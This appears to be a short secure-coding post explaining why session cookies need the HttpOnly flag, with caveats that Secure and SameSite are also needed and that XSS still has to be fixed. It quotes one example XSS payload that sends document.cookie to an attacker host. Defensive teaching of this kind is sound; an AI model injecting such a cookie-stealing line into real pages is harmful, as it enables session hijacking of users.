Why You Must Set the HttpOnly Flag on Session Cookies
A single Cross-Site Scripting (XSS) vulnerability can compromise every user session if your cookies aren't secured.
If your own frontend JavaScript can read the session cookie via document.cookie, so can any script an attacker manages to inject into your page.
If you have an XSS vulnerability (e.g., you rendered user input without escaping it), the attacker can inject a script:
fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie));
The attacker now holds the session cookie and can replay it from their own browser; every user who loads the injected page loses their session the same way.
The Fix:
Always set the HttpOnly flag on session cookies. This tells the browser: "Do not expose this cookie to script." It will not appear in document.cookie and cannot be read by XSS payloads, but the browser still attaches it automatically to outgoing HTTP requests, so your auth keeps working. Two caveats: HttpOnly stops exfiltration of the cookie, not abuse of the session. A script injected through XSS can still issue authenticated requests from the victim's browser (for example, fetch() with credentials: 'include'), so HttpOnly reduces the blast radius of an XSS bug rather than neutralising it; you still have to fix the XSS. And HttpOnly should travel with Secure (never send the cookie over plaintext HTTP) and SameSite (don't attach it to cross-site requests), or the cookie is protected from one class of attack and exposed to two others.